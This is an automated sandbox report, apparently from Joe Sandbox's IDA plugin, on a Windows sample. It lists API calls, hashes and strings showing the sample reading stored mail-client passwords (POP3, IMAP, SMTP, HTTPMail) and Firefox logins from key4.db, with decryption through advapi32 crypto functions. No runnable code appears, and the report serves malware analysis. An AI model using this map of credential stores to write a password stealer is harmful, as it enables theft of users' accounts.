                                                                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                      • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                      • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                      • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                      • API String ID: 2238633743-192783356
                                                                                      • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                      • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                      • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                      • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                      • API String ID: 3963849919-1658304561
                                                                                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                      • String ID: (yE$(yE$(yE
                                                                                      • API String ID: 1865533344-362086290
                                                                                      • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                      • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040EBD8
                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                      • memset.MSVCRT ref: 0040EC2B
                                                                                      • memset.MSVCRT ref: 0040EC47
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                      • memset.MSVCRT ref: 0040ECDD
                                                                                      • memset.MSVCRT ref: 0040ECF2
                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                      • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                      • memset.MSVCRT ref: 0040EDE1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                      • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                      • API String ID: 3137614212-1455797042
                                                                                      • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                      • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                      • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                      • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                      APIs
                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                      • memset.MSVCRT ref: 0040E736
                                                                                      • memset.MSVCRT ref: 0040E74F
                                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                      • memset.MSVCRT ref: 0040E858
                                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                      • API String ID: 4171719235-3943159138
                                                                                      • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                      • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                      • GetDC.USER32 ref: 004104E2
                                                                                      • strlen.MSVCRT ref: 00410522
                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                      • sprintf.MSVCRT ref: 00410640
                                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                      • API String ID: 1703216249-3046471546
                                                                                      • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                      • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004024F5
                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,7508EB20,?,00000000), ref: 00402533
                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                      • API String ID: 168965057-606283353
                                                                                      • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                      • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00402869
                                                                                        • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                      • _mbscpy.MSVCRT(?,?,7508EB20,?,00000000), ref: 004028A3
                                                                                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7508EB20,?,00000000), ref: 0040297B
                                                                                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                      • API String ID: 1497257669-167382505
                                                                                      • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                      • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                      • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                      • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                      • String ID:
                                                                                      • API String ID: 2998058495-0
                                                                                      • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                      • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcmp$memcpy
                                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                      • API String ID: 231171946-2189169393
                                                                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                      • API String ID: 633282248-1996832678
                                                                                      • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                      • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00406782
                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                      • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                      • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                      • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                      • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                      • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                      • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                      • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
